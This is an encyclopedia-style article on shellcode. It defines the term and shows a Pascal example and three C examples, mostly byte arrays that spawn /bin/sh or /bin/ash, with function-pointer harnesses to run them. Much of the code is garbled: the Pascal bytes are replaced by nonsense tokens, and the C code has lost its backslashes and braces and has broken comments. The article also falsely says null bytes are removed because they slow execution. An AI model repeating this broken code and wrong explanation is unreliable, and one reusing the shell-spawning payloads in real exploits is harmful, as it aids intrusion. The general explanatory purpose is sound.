Shellcode

A shellcode is a set of commands generally programmed in assembly language and transferred to opcodes (set of hexadecimal values) that are usually injected into the program execution stack to achieve that the machine in which it resides executes the operation that has been programmed.

Term

The term shellcode derives from its general purpose, this was a portion of an exploit used to gain a shell, this is currently the most common purpose for which they are used.

Pascal shellcode example

To execute a shellcode, a higher level language is usually used, such as the Pascal language. The opcodes obtained from our assembly code are enlisted in a byte array and loaded into a prototype to be called.

An example of a shellcode is the following:

 Prototype Ajec

 ' Variables. Var ShellCode[]:Byte ' Byte matrix for the OpCode.. Var Prototypo:Ejec ' Prototype to run the ShellCode. ' We started/loaded the ShellCode.ShellCode = [ fake31, faked2, hipb2, fake30, fake8b, fake8b, age12, hip8b, age52, hip8b, hip8b, age52, fake1c, nightmare8b, nightmare42 _
, fake08, fake8b, age72, age20, hip8b, age12, stranger7e, fake0c, age33, fake75, nightmaref2, nightmare89, fakec7, nightmare03 _
, fake78, fake3c, hip8b, hip57, fake78, stranger8b, age7a, hip20, fake01, fakec7, nightmare31, fakeed, fake8b _
, fake34, granddaph, fake01, fakec6, fake45, fake81, fake3e, fake46, fake74, fake61, fake75, fakef2, fake81, fake7e _
, fake08, fake45, hip78, fake69, age75, fake8b, fake8b, fake24, age24, fake01, fakec7, fake66, stranger8b, nightmare2c _
, fake6f, hip8b, fake7a, age1c, outdoors01, age8b, age7c, hipfc, outdoors01, nightmarec7, stranger68, stranger79, stranger74 _, age7 b, hipfc, hipfc, hipfc, hipp, hipp, hipp, hipp, hippc, hipp, hipp, hippc, hipp, hipp
, fake65, fake01, hip68, fake6b, fake65, fake6e, fake42, fake20, fake42, fake72, fake6f, fake89, fake89, fake1, fakefe _
, fake49, fake0b, fake31, fakec0, fake51, fake50, fakeff, faked7]

 'We set the prototype code to run.Prototypo@ = ShellCode[0]@

 ' We run the ShellCode.Prototypo

As you can see, opcodes are hexadecimal values that are converted to bytes (integer values between 0 and 255) and that the operating system understands as assembly code that it executes.

C shellcode example

The following example shows a shellcode contained in an array of a program written in C language:

char shellcode[]=
"x31xc0" /* xorl %eax,%eax */
"x31xdb" /* xorl %ebx,%ebx */
"x31xc9" /* xorl %ecx,%ecx */
"xb0x46" /* movl $0x46,%al */
"xcdx80" /* int $0x80 *
"x50" /* pushl %eax */
"x68"/ash" /* pushl $0x6873612f */
"x68"/bin" /* pushl $0x6e69622f */
"x89xe3" /* movl %esp,%ebx *
"x50" /* pushl %eax */
"x53" /* push %ebx */
"x89xe1" /* movl %esp,%ecx */
"xb0x0b" /* movb $0x0b,%al *
"xcdx80" /* int $0x80 *
;

So we have that a shellcode is machine code written in hexadecimal notation. They are later used within programs written in C, as in the following example shellcode:

// shellcode.c
// compile with gcc shellcode.c -o shellcode
void main()
{
(void(*)(void)
{
"xebx19x31xc0x31xdbx31xd2x31xc9"
"xb0x04xb3x01x59xb2x21xcdx80x31"
"xc0xb0x01x31xdbxcdx80xe8xff"
"xffxffx76x69x73x69x74x61x20x68"
"x74x74x70x3ax2fx2fx68x65x69x6e"
"x7ax2ex68x65x72x6cx69x74x7ax2e"
"x63x6cx20x3dx29"
!
();
!

Or this one:

char shellcode[] = "x31xc0x50x68x2fx2fx73x68x2f"
"x62x69x6ex89xe3x50x53x89xe1xb0"
"x0bxcdx80"
int main()
{
void (*fp)();
fp = (void*) &shellcode;
fp();
!

Information

Shellcodes must be short in order to be injected onto the stack, which is usually a small space.

Shellcodes are used to execute code by exploiting certain vulnerabilities in the code called buffer overflows. Mainly the shellcode is programmed to allow executing a command interpreter on the infected computer.

It is common for the compilation of a shellcode to produce null bytes, which must be removed from it, since they would slow down the execution of the shellcode. To do this, the programmer uses various techniques, such as replacing the instructions that generate NULL bytes with others that do not, or performing an XOR operation, moving towards smaller registers (such as AH, AL), and thus allowing the shellcode to be really injectable.